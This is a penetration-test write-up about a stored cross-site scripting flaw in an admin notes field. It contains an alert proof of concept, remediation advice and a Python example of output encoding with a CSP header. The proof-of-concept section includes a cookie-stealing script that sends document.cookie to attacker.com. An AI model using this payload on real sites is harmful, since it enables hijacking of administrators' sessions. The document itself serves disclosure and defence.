Penetration Testing Writeup: XSS in Admin Panel

Executive Summary

A stored cross-site scripting (XSS) vulnerability was found in [Target Application]'s admin panel during a penetration test. An attacker can inject script into admin inputs, and that script executes in the browser of every admin user who views the affected content. This report details the issue and the remediation steps.

Vulnerability Details

Description

The admin note field neither sanitizes input before storing it nor encodes it when displaying it, so script embedded in a note executes in the admin panel whenever the note is viewed.

Impact

Proof of Concept

  1. In the admin panel, add a note: <script>alert('Stored XSS');</script>.
  2. View the note and observe the alert.
  3. Malicious payload: <script>fetch('https://attacker.com/steal?cookie='+document.cookie);</script>.

Steps to Reproduce

  1. Log in to https://[target-application]/admin/notes.
  2. Add a note with <script>alert('Stored XSS');</script>.
  3. View the note to confirm the alert.

Remediation Recommendations

  1. Input Sanitization:
    • Use OWASP AntiSamy for note inputs.
  2. Output Encoding:
    • Encode notes before rendering.
  3. Content Security Policy:
    • Apply CSP: Content-Security-Policy: script-src 'self';.
  4. Secure Development:
    • Train admins and developers on XSS prevention.
  5. Security Testing:
    • Conduct regular audits.
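The following is an added example, not code from the report or from [Target Application]: it assumes a Python back end that renders stored notes into HTML, and contrasts the vulnerable rendering with output encoding plus the CSP header recommended above, using the proof-of-concept payload from this report as constructed input.

```python
import html

# Constructed sample notes: one benign, one the stored-XSS payload from the PoC above.
SAMPLE_NOTES = [
    "Rotate the backup keys on Friday",
    "<script>alert('Stored XSS');</script>",
]

NOTE_OPEN, NOTE_CLOSE = '<li class="note">', "</li>"


def render_note_unsafe(note: str) -> str:
    """'Before': the stored note is interpolated verbatim into the HTML,
    so any markup it contains is parsed and executed by the admin's browser."""
    return f"{NOTE_OPEN}{note}{NOTE_CLOSE}"


def render_note_safe(note: str) -> str:
    """'After': HTML-encode the note for the element-content context before it is
    placed in the page; quote=True also encodes ' and " for attribute contexts."""
    return f"{NOTE_OPEN}{html.escape(note, quote=True)}{NOTE_CLOSE}"


def csp_headers() -> dict:
    """Response headers for the admin panel: the policy from the remediation list,
    which makes the browser refuse inline <script> blocks and third-party script hosts
    even if an encoding bug slips through."""
    return {"Content-Security-Policy": "script-src 'self';"}


def contains_active_markup(rendered: str) -> bool:
    """Check used here to show the difference: does the note body still carry a raw
    tag boundary, i.e. a character the HTML parser would treat as markup?"""
    inner = rendered[len(NOTE_OPEN):-len(NOTE_CLOSE)]
    return "<" in inner or ">" in inner


def render_notes_page(notes: list) -> tuple:
    """Hardened response: (headers, body) with every note encoded and CSP applied."""
    body = "<ul>" + "".join(render_note_safe(n) for n in notes) + "</ul>"
    return csp_headers(), body


if __name__ == "__main__":
    for note in SAMPLE_NOTES:
        print("unsafe:", render_note_unsafe(note))
        print("safe:  ", render_note_safe(note))
    print(render_notes_page(SAMPLE_NOTES))
```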

Conclusion

The Stored XSS vulnerability in [Target Application]’s admin panel is critical and requires immediate remediation.
